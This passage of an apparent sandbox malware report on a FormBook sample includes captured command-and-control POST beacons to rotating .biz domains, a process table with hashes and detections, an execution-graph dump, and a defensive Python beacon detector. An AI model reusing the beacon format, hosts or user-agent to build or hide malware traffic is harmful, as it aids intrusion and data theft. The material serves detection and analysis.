                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: btst=74775f00e314d2dc9f913370c78f2c1a|8.46.123.189|1734076671|1734076671|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID: 5
                                        Source IP: 192.168.2.7
                                        Source Port: 49738
                                        Destination IP: 18.141.10.107
                                        Destination Port: 80
                                        PID / Process: (blank in the report)

                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 13, 2024 08:58:03.445158958 CET | 348 | OUT | POST /btfx HTTP/1.1
                                        Cache-Control: no-cache
                                        Connection: Keep-Alive
                                        Pragma: no-cache
                                        Host: knjghuig.biz
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                        Content-Length: 874
                                        Dec 13, 2024 08:58:03.445158958 CET | 874 | OUT | Data Raw: 2d c3 2f 50 f1 75 5e 35 5e 03 00 00 ea 1c b5 4f 1f 0f 5d ff b8 e6 a5 16 e7 bf 16 69 f2 77 28 24 3d 42 54 32 7f 19 f0 e3 0f 6f e1 25 00 33 cf 50 0c 73 c3 dc 5f 4f dc bf 32 37 4f 76 44 44 74 ad 9f 82 1d 0c d5 30 3d d5 3b 5f 29 98 4b 81 5f 64 ee da
                                        Data Ascii: -/Pu^5^O]iw($=BT2o%3Ps_O27OvDDt0=;_)K_dB+I1!jD@;v_n*^A!Ul,Q;u&!kb=WIp4Ay5rV43]%a$qbflH%z@2a5F}ZNJ-"pP<3:J`
                                        Dec 13, 2024 08:58:05.495245934 CET | 412 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Fri, 13 Dec 2024 07:58:05 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: btst=4eb91c0fa1af41a8f694ca6a8a0a6b10|8.46.123.189|1734076685|1734076685|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID: 6
                                        Source IP: 192.168.2.7
                                        Source Port: 49973
                                        Destination IP: 18.141.10.107
                                        Destination Port: 80
                                        PID / Process: (blank in the report)

                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 13, 2024 08:59:45.773694038 CET | 344 | OUT | POST /x HTTP/1.1
                                        Cache-Control: no-cache
                                        Connection: Keep-Alive
                                        Pragma: no-cache
                                        Host: vcddkls.biz
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                        Content-Length: 874
                                        Dec 13, 2024 08:59:45.773741007 CET | 874 | OUT | Data Raw: 51 50 ef ee 46 72 c6 f0 5e 03 00 00 06 f4 60 1e 74 fe 9c 32 7d d2 1a 75 e3 ac f5 41 a2 b1 1e 62 b5 25 ce 26 f3 8a c9 f0 e7 b4 ee c1 6f b3 d1 5c a7 67 a5 6d a7 3b fe 73 2d 97 dc fd 09 0b 91 a2 17 e6 ef f7 27 e5 e2 76 ed 0b d6 54 bb d3 23 5f 33 36
                                        Data Ascii: QPFr^`t2}uAb%&o\gm;s-'vT#_36\ #31{?;IQK_He&5YZ"sXsQlZ"5ixomMqVrqM+:vxyr"TM4,PR@foM.!pzc[[BeG2@
                                        Dec 13, 2024 08:59:47.833221912 CET | 411 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Fri, 13 Dec 2024 07:59:47 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: btst=dddbf26da97ca1ee58a7be5d18438cfd|8.46.123.189|1734076787|1734076787|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0

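The four POST sessions above share one shape: a short lowercase path on a .biz host, the same WeChat/QQBrowser user-agent, no Content-Type, the no-cache header pair, and a body of exactly 874 bytes whose captured prefix always carries 5e 03 00 00 at offset 8 (0x35e = 862 = 874 - 12, read little-endian). The following Python is an added example, not part of the Joe Sandbox report and not a FormBook protocol decoder: it parses raw HTTP request headers, scores them against those observable traits, and checks the body length field. The sample request is transcribed from session 3 (the report truncates the body, so the 874-byte body is constructed from the captured 12-byte prefix plus zero padding); the benign control request, the indicator names and the three-hit threshold are the example's own assumptions.

```python
"""Score captured HTTP requests against the beacon traits seen in the sessions above."""
from __future__ import annotations

import re
import struct
from dataclasses import dataclass

# User-agent string exactly as captured in sessions 3 to 6 of the report.
BEACON_UA = (
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat "
    "QBCore/3.43.884.400 QQBrowser/9.0.2524.400"
)

# Constructed sample input: headers transcribed from session 3; the second request
# is an invented benign browser request used as a control.
BEACON_REQUEST = "\r\n".join([
    "POST /wibawwpi HTTP/1.1",
    "Cache-Control: no-cache",
    "Connection: Keep-Alive",
    "Pragma: no-cache",
    "Host: ssbzmoy.biz",
    "User-Agent: " + BEACON_UA,
    "Content-Length: 874",
    "", "",
])
BENIGN_REQUEST = "\r\n".join([
    "GET /index.html HTTP/1.1",
    "Host: example.com",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/120.0",
    "Accept: text/html",
    "", "",
])

# Constructed body: the 12 bytes captured at the start of session 3's POST data,
# zero-padded to the declared Content-Length of 874 (the report truncates the rest).
SAMPLE_BODY = bytes.fromhex("3cc1f9ed685ff4ba5e030000") + b"\x00" * 862


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict[str, str]  # header names lower-cased


def parse_request(raw: str) -> HttpRequest:
    """Parse the request line and headers of one raw HTTP/1.x request."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers)


def beacon_indicators(req: HttpRequest) -> list[str]:
    """Return the names of the captured-beacon traits this request exhibits."""
    hits: list[str] = []
    if req.method == "POST" and re.fullmatch(r"/[a-z]{1,16}", req.path):
        hits.append("short lowercase path")          # /wibawwpi, /mddjrljmh, /btfx, /x
    if req.headers.get("content-length") == "874":
        hits.append("874-byte body")
    if req.headers.get("user-agent") == BEACON_UA:
        hits.append("fixed WeChat/QQBrowser user-agent")
    if req.method == "POST" and "content-type" not in req.headers:
        hits.append("POST without Content-Type")
    if req.headers.get("cache-control") == "no-cache" and req.headers.get("pragma") == "no-cache":
        hits.append("no-cache header pair")
    return hits


def is_beacon(req: HttpRequest, min_hits: int = 3) -> bool:
    """Assumed threshold: three or more traits together are treated as a beacon."""
    return len(beacon_indicators(req)) >= min_hits


def body_length_field_consistent(body: bytes) -> bool:
    """Check the observation that bytes 8..11 (little-endian) equal len(body) - 12.

    This is only what the four captured bodies show (0x35e = 862 = 874 - 12); it is
    not a documented field of the protocol.
    """
    if len(body) < 12:
        return False
    (declared,) = struct.unpack_from("<I", body, 8)
    return declared == len(body) - 12


if __name__ == "__main__":
    for raw in (BEACON_REQUEST, BENIGN_REQUEST):
        req = parse_request(raw)
        print(req.method, req.path, is_beacon(req), beacon_indicators(req))
    print("length field consistent:", body_length_field_consistent(SAMPLE_BODY))
```

Run over proxy or IDS logs, the header scoring catches the beacon shape regardless of the domain or path, which the sample rotates; the body check adds a second, independent signal when full payloads are available.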


                                        Target ID:0
                                        Start time:02:57:39
                                        Start date:13/12/2024
                                        Path:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\INV_NE_02_2034388.exe"
                                        Imagebase:0x400000
                                        File size:1'790'464 bytes
                                        MD5 hash:C5843430A72FA7B29070C33F0F4D83D2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:02:57:39
                                        Start date:13/12/2024
                                        Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                        Imagebase:0x400000
                                        File size:1'658'880 bytes
                                        MD5 hash:4768582FEC7E07C429C532098BB3A67A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low
                                        Has exited:false

                                        Target ID:5
                                        Start time:02:57:40
                                        Start date:13/12/2024
                                        Path:C:\Windows\System32\alg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\alg.exe
                                        Imagebase:0x140000000
                                        File size:1'594'368 bytes
                                        MD5 hash:B0C38B43BA0CC2CDF73E2C84A80101CF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low
                                        Has exited:false

                                        Target ID:9
                                        Start time:02:57:41
                                        Start date:13/12/2024
                                        Path:C:\Windows\System32\drivers\AppVStrm.sys
                                        Wow64 process (32bit):false
                                        Commandline:
                                        Imagebase:0x7ff6357c0000
                                        File size:138'056 bytes
                                        MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:false

                                        Target ID:10
                                        Start time:02:57:41
                                        Start date:13/12/2024
                                        Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                        Wow64 process (32bit):
                                        Commandline:
                                        Imagebase:
                                        File size:174'408 bytes
                                        MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:false

                                        Target ID:11
                                        Start time:02:57:41
                                        Start date:13/12/2024
                                        Path:C:\Windows\System32\drivers\AppvVfs.sys
                                        Wow64 process (32bit):
                                        Commandline:
                                        Imagebase:
                                        File size:154'952 bytes
                                        MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:false

                                        Target ID:12
                                        Start time:02:57:41
                                        Start date:13/12/2024
                                        Path:C:\Windows\System32\AppVClient.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\AppVClient.exe
                                        Imagebase:0x140000000
                                        File size:1'348'608 bytes
                                        MD5 hash:BAE30C5C71632F53795DE111E7ED6DC7
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low
                                        Has exited:true

                                        Target ID:14
                                        Start time:02:57:43
                                        Start date:13/12/2024
                                        Path:C:\Windows\System32\FXSSVC.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\fxssvc.exe
                                        Imagebase:0x140000000
                                        File size:1'242'624 bytes
                                        MD5 hash:CCD5F7B3E8C0B4733DD115FF88547F14
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low
                                        Has exited:true

                                        Target ID:16
                                        Start time:02:57:45
                                        Start date:13/12/2024
                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                        Imagebase:0x140000000
                                        File size:2'354'176 bytes
                                        MD5 hash:F48DDCBA6A247532AFB4E29CAAD7C016
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low
                                        Has exited:false

                                        Target ID:17
                                        Start time:02:57:45
                                        Start date:13/12/2024
                                        Path:C:\Windows\SysWOW64\svchost.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\INV_NE_02_2034388.exe"
                                        Imagebase:0x960000
                                        File size:46'504 bytes
                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.1702591892.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.1704054953.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        Target ID:18
                                        Start time:02:57:46
                                        Start date:13/12/2024
                                        Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                        Imagebase:0x140000000
                                        File size:1'725'440 bytes
                                        MD5 hash:1B5C1CB5B173A3E9004CEBAB7FD31E75
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low
                                        Has exited:true


                                          Execution Graph

                                          Execution Coverage: 3.5%
                                          Dynamic/Decrypted Code Coverage: 6.8%
                                          Signature Coverage: 9.8%
                                          Total number of Nodes: 2000
                                          Total number of Limit Nodes: 63

                                          [Execution graph: interactive node/edge rendering; the raw node list is omitted here. The listing starts at nodes 108725 (b85a3b) and 108742 (43fe27). Win32 APIs resolved in the rendered nodes: CreateThread, RtlExitUserThread, VirtualAlloc, VirtualFree, VariantClear, DecodePointer, RaiseException, RtlAllocateHeap, GetModuleHandleExW, GetProcAddress, ExitProcess, CharUpperBuffW, PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, TranslateAcceleratorW, LockWindowUpdate, DestroyWindow, Sleep, WaitForSingleObject, GetExitCodeProcess, CloseHandle, timeGetTime, QueryPerformanceCounter, QueryPerformanceFrequency. Runtime labels attached to nodes: Mailbox, _memmove, __cinit, std::exception::exception, _free, __getptd_noexit, __NMSG_WRITE, ___crtCorExitProcess.]
109084->109177 109085->108986 109087 4084c0 69 API calls 109087->109103 109088->109103 109180 469e4a 89 API calls 4 library calls 109088->109180 109090 409ea0 341 API calls 109090->109103 109091 409c90 Mailbox 59 API calls 109091->109103 109092 469e4a 89 API calls 109092->109103 109095 408d40 59 API calls 109095->109103 109099 40f195 109184 469e4a 89 API calls 4 library calls 109099->109184 109101 443e25 109101->108986 109102 40ea78 109102->108986 109103->109087 109103->109090 109103->109091 109103->109092 109103->109095 109103->109099 109103->109102 109175 407f77 59 API calls 2 library calls 109103->109175 109181 456e8f 59 API calls 109103->109181 109182 47c5c3 341 API calls 109103->109182 109183 47b53c 341 API calls Mailbox 109103->109183 109185 4793c6 341 API calls Mailbox 109103->109185 109105 40f650 109104->109105 109106 40f4ba 109104->109106 109107 407de1 59 API calls 109105->109107 109108 40f4c6 109106->109108 109109 44441e 109106->109109 109115 40f58c Mailbox 109107->109115 109365 40f290 341 API calls 2 library calls 109108->109365 109366 47bc6b 341 API calls Mailbox 109109->109366 109112 44442c 109116 40f630 109112->109116 109367 469e4a 89 API calls 4 library calls 109112->109367 109114 40f4fd 109114->109112 109114->109115 109114->109116 109264 404e4a 109115->109264 109270 47df37 109115->109270 109273 463c37 109115->109273 109276 46cb7a 109115->109276 109356 47445a 109115->109356 109116->108986 109117 409c90 Mailbox 59 API calls 109118 40f5e3 109117->109118 109118->109116 109118->109117 109125 403212 109124->109125 109127 4031e0 109124->109127 109125->108986 109126 403205 IsDialogMessageW 109126->109125 109126->109127 109127->109125 109127->109126 109128 43cf32 GetClassLongW 109127->109128 109128->109126 109128->109127 109129->108986 109130->108926 109131->108931 109132->108986 109133->108936 109134->108936 109135->108936 109136->108986 109137->108986 109138->108986 109140 409851 109139->109140 109141 40984b 109139->109141 109142 43f5d3 __i64tow 
109140->109142 109143 409899 109140->109143 109144 409857 __itow 109140->109144 109148 43f4da 109140->109148 109141->108986 110356 423698 83 API calls 3 library calls 109143->110356 109147 420db6 Mailbox 59 API calls 109144->109147 109149 409871 109147->109149 109150 420db6 Mailbox 59 API calls 109148->109150 109155 43f552 Mailbox _wcscpy 109148->109155 109149->109141 109151 407de1 59 API calls 109149->109151 109152 43f51f 109150->109152 109151->109141 109153 420db6 Mailbox 59 API calls 109152->109153 109154 43f545 109153->109154 109154->109155 109156 407de1 59 API calls 109154->109156 110357 423698 83 API calls 3 library calls 109155->110357 109156->109155 109157->108986 109158->108986 109160 420db6 Mailbox 59 API calls 109159->109160 109161 407688 109160->109161 109162 420db6 Mailbox 59 API calls 109161->109162 109163 407696 109162->109163 109163->108983 109164->108983 109165->108983 109167 407df0 __wsetenvp _memmove 109166->109167 109168 420db6 Mailbox 59 API calls 109167->109168 109169 407e2e 109168->109169 109169->108983 109170->108983 109171->108983 109172->108983 109173->108983 109174->108983 109175->109103 109176->109103 109186 422c44 109177->109186 109179 422d4b 109179->109080 109180->109103 109181->109103 109182->109103 109183->109103 109184->109101 109185->109103 109187 422c50 __write 109186->109187 109194 423217 109187->109194 109193 422c77 __write 109193->109179 109211 429c0b 109194->109211 109196 422c59 109197 422c88 DecodePointer DecodePointer 109196->109197 109198 422c65 109197->109198 109199 422cb5 109197->109199 109208 422c82 109198->109208 109199->109198 109257 4287a4 59 API calls _memcpy_s 109199->109257 109201 422d18 EncodePointer EncodePointer 109201->109198 109202 422cec 109202->109198 109206 422d06 EncodePointer 109202->109206 109259 428864 61 API calls 2 library calls 109202->109259 109203 422cc7 109203->109201 109203->109202 109258 428864 61 API calls 2 library calls 109203->109258 109206->109201 109207 422d00 109207->109198 109207->109206 
109260 423220 109208->109260 109212 429c2f EnterCriticalSection 109211->109212 109213 429c1c 109211->109213 109212->109196 109218 429c93 109213->109218 109215 429c22 109215->109212 109242 4230b5 58 API calls 3 library calls 109215->109242 109219 429c9f __write 109218->109219 109220 429cc0 109219->109220 109221 429ca8 109219->109221 109224 429ce1 __write 109220->109224 109246 42881d 58 API calls __malloc_crt 109220->109246 109243 42a16b 58 API calls __NMSG_WRITE 109221->109243 109224->109215 109225 429cad 109244 42a1c8 58 API calls 7 library calls 109225->109244 109227 429cd5 109229 429ceb 109227->109229 109230 429cdc 109227->109230 109228 429cb4 109245 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 109228->109245 109233 429c0b __lock 58 API calls 109229->109233 109247 428b28 58 API calls __getptd_noexit 109230->109247 109235 429cf2 109233->109235 109236 429d17 109235->109236 109237 429cff 109235->109237 109249 422d55 109236->109249 109248 429e2b InitializeCriticalSectionAndSpinCount 109237->109248 109240 429d0b 109255 429d33 LeaveCriticalSection _doexit 109240->109255 109243->109225 109244->109228 109246->109227 109247->109224 109248->109240 109250 422d5e RtlFreeHeap 109249->109250 109254 422d87 _free 109249->109254 109251 422d73 109250->109251 109250->109254 109256 428b28 58 API calls __getptd_noexit 109251->109256 109253 422d79 GetLastError 109253->109254 109254->109240 109255->109224 109256->109253 109257->109203 109258->109202 109259->109207 109263 429d75 LeaveCriticalSection 109260->109263 109262 422c87 109262->109193 109263->109262 109265 404e54 109264->109265 109266 404e5b 109264->109266 109368 4253a6 109265->109368 109268 404e6a 109266->109268 109269 404e7b FreeLibrary 109266->109269 109268->109118 109269->109268 109638 47cadd 109270->109638 109272 47df47 109272->109118 109771 46445a GetFileAttributesW 109273->109771 109277 407667 59 API calls 109276->109277 109278 46cbaf 109277->109278 109279 407667 59 API calls 109278->109279 
109280 46cbb8 109279->109280 109281 46cbcc 109280->109281 109971 409b3c 109280->109971 109283 409837 84 API calls 109281->109283 109284 46cbe9 109283->109284 109285 46cd1a Mailbox 109284->109285 109286 46ccea 109284->109286 109287 46cc0b 109284->109287 109285->109118 109775 404ddd 109286->109775 109288 409837 84 API calls 109287->109288 109290 46cc17 109288->109290 109292 408047 59 API calls 109290->109292 109295 46cc23 109292->109295 109293 404ddd 136 API calls 109296 46cd16 109293->109296 109294 407667 59 API calls 109297 46cd4b 109294->109297 109299 46cc37 109295->109299 109300 46cc69 109295->109300 109296->109285 109296->109294 109298 407667 59 API calls 109297->109298 109301 46cd54 109298->109301 109302 408047 59 API calls 109299->109302 109303 409837 84 API calls 109300->109303 109304 407667 59 API calls 109301->109304 109305 46cc47 109302->109305 109306 46cc76 109303->109306 109307 46cd5d 109304->109307 109975 407cab 109305->109975 109309 408047 59 API calls 109306->109309 109310 407667 59 API calls 109307->109310 109313 46cc82 109309->109313 109311 46cd66 109310->109311 109314 409837 84 API calls 109311->109314 109982 464a31 GetFileAttributesW 109313->109982 109318 46cd73 109314->109318 109315 409837 84 API calls 109319 46cc5d 109315->109319 109317 46cc8b 109320 46cc9e 109317->109320 109323 4079f2 59 API calls 109317->109323 109799 40459b 109318->109799 109322 407b2e 59 API calls 109319->109322 109325 409837 84 API calls 109320->109325 109331 46cca4 109320->109331 109322->109300 109323->109320 109324 46cd8e 109850 4079f2 109324->109850 109327 46cccb 109325->109327 109983 4637ef 75 API calls Mailbox 109327->109983 109330 46cdd1 109333 408047 59 API calls 109330->109333 109331->109285 109332 4079f2 59 API calls 109335 46cdae 109332->109335 109334 46cddf 109333->109334 109853 407b2e 109334->109853 109335->109330 109984 407bcc 109335->109984 109339 407b2e 59 API calls 109341 46cdfb 109339->109341 109340 46cdc3 109342 407bcc 59 API calls 109340->109342 109343 
407b2e 59 API calls 109341->109343 109342->109330 109344 46ce09 109343->109344 109345 409837 84 API calls 109344->109345 109346 46ce15 109345->109346 109862 464071 109346->109862 109348 46ce26 109349 463c37 3 API calls 109348->109349 109350 46ce30 109349->109350 109351 409837 84 API calls 109350->109351 109354 46ce61 109350->109354 109352 46ce4e 109351->109352 109916 469155 109352->109916 109355 404e4a 84 API calls 109354->109355 109355->109285 109357 409837 84 API calls 109356->109357 109358 474494 109357->109358 110311 406240 109358->110311 109360 4744a4 109361 4744c9 109360->109361 109362 409ea0 341 API calls 109360->109362 109364 4744cd 109361->109364 110336 409a98 59 API calls Mailbox 109361->110336 109362->109361 109364->109118 109365->109114 109366->109112 109367->109116 109369 4253b2 __write 109368->109369 109370 4253c6 109369->109370 109371 4253de 109369->109371 109403 428b28 58 API calls __getptd_noexit 109370->109403 109377 4253d6 __write 109371->109377 109381 426c11 109371->109381 109374 4253cb 109404 428db6 9 API calls _memcpy_s 109374->109404 109377->109266 109382 426c43 EnterCriticalSection 109381->109382 109383 426c21 109381->109383 109385 4253f0 109382->109385 109383->109382 109384 426c29 109383->109384 109386 429c0b __lock 58 API calls 109384->109386 109387 42533a 109385->109387 109386->109385 109388 425349 109387->109388 109389 42535d 109387->109389 109449 428b28 58 API calls __getptd_noexit 109388->109449 109395 425359 109389->109395 109406 424a3d 109389->109406 109391 42534e 109450 428db6 9 API calls _memcpy_s 109391->109450 109405 425415 LeaveCriticalSection LeaveCriticalSection __wfsopen 109395->109405 109399 425377 109423 430a02 109399->109423 109401 42537d 109401->109395 109402 422d55 _free 58 API calls 109401->109402 109402->109395 109403->109374 109404->109377 109405->109377 109407 424a50 109406->109407 109411 424a74 109406->109411 109408 4246e6 __fclose_nolock 58 API calls 109407->109408 109407->109411 109409 424a6d 109408->109409 109451 
42d886 109409->109451 109412 430b77 109411->109412 109413 425371 109412->109413 109414 430b84 109412->109414 109416 4246e6 109413->109416 109414->109413 109415 422d55 _free 58 API calls 109414->109415 109415->109413 109417 4246f0 109416->109417 109418 424705 109416->109418 109593 428b28 58 API calls __getptd_noexit 109417->109593 109418->109399 109420 4246f5 109594 428db6 9 API calls _memcpy_s 109420->109594 109422 424700 109422->109399 109424 430a0e __write 109423->109424 109425 430a32 109424->109425 109426 430a1b 109424->109426 109427 430abd 109425->109427 109430 430a42 109425->109430 109610 428af4 58 API calls __getptd_noexit 109426->109610 109615 428af4 58 API calls __getptd_noexit 109427->109615 109429 430a20 109611 428b28 58 API calls __getptd_noexit 109429->109611 109433 430a60 109430->109433 109434 430a6a 109430->109434 109612 428af4 58 API calls __getptd_noexit 109433->109612 109437 42d206 ___lock_fhandle 59 API calls 109434->109437 109435 430a65 109616 428b28 58 API calls __getptd_noexit 109435->109616 109439 430a70 109437->109439 109441 430a83 109439->109441 109442 430a8e 109439->109442 109440 430ac9 109617 428db6 9 API calls _memcpy_s 109440->109617 109595 430add 109441->109595 109613 428b28 58 API calls __getptd_noexit 109442->109613 109446 430a27 __write 109446->109401 109447 430a89 109614 430ab5 LeaveCriticalSection __unlock_fhandle 109447->109614 109449->109391 109450->109395 109452 42d892 __write 109451->109452 109453 42d8b6 109452->109453 109454 42d89f 109452->109454 109455 42d955 109453->109455 109457 42d8ca 109453->109457 109552 428af4 58 API calls __getptd_noexit 109454->109552 109558 428af4 58 API calls __getptd_noexit 109455->109558 109460 42d8f2 109457->109460 109461 42d8e8 109457->109461 109459 42d8a4 109553 428b28 58 API calls __getptd_noexit 109459->109553 109479 42d206 109460->109479 109554 428af4 58 API calls __getptd_noexit 109461->109554 109462 42d8ed 109559 428b28 58 API calls __getptd_noexit 109462->109559 109466 42d8f8 109468 
42d90b 109466->109468 109469 42d91e 109466->109469 109488 42d975 109468->109488 109555 428b28 58 API calls __getptd_noexit 109469->109555 109470 42d961 109560 428db6 9 API calls _memcpy_s 109470->109560 109471 42d8ab __write 109471->109411 109475 42d917 109557 42d94d LeaveCriticalSection __unlock_fhandle 109475->109557 109476 42d923 109556 428af4 58 API calls __getptd_noexit 109476->109556 109480 42d212 __write 109479->109480 109481 42d261 EnterCriticalSection 109480->109481 109483 429c0b __lock 58 API calls 109480->109483 109482 42d287 __write 109481->109482 109482->109466 109484 42d237 109483->109484 109485 42d24f 109484->109485 109561 429e2b InitializeCriticalSectionAndSpinCount 109484->109561 109562 42d28b LeaveCriticalSection _doexit 109485->109562 109489 42d982 __write_nolock 109488->109489 109490 42d9e0 109489->109490 109491 42d9c1 109489->109491 109521 42d9b6 109489->109521 109495 42da38 109490->109495 109496 42da1c 109490->109496 109572 428af4 58 API calls __getptd_noexit 109491->109572 109494 42d9c6 109573 428b28 58 API calls __getptd_noexit 109494->109573 109499 42da51 109495->109499 109578 4318c1 60 API calls 3 library calls 109495->109578 109575 428af4 58 API calls __getptd_noexit 109496->109575 109497 42e1d6 109497->109475 109563 435c6b 109499->109563 109501 42d9cd 109574 428db6 9 API calls _memcpy_s 109501->109574 109504 42da21 109576 428b28 58 API calls __getptd_noexit 109504->109576 109506 42da5f 109508 42ddb8 109506->109508 109579 4299ac 58 API calls 2 library calls 109506->109579 109510 42ddd6 109508->109510 109511 42e14b WriteFile 109508->109511 109509 42da28 109577 428db6 9 API calls _memcpy_s 109509->109577 109514 42defa 109510->109514 109515 42ddec 109510->109515 109516 42ddab GetLastError 109511->109516 109523 42dd78 109511->109523 109517 42df05 109514->109517 109518 42dfef 109514->109518 109525 42de5b WriteFile 109515->109525 109528 42e184 109515->109528 109516->109523 109517->109528 109530 42df6a WriteFile 109517->109530 109518->109528 
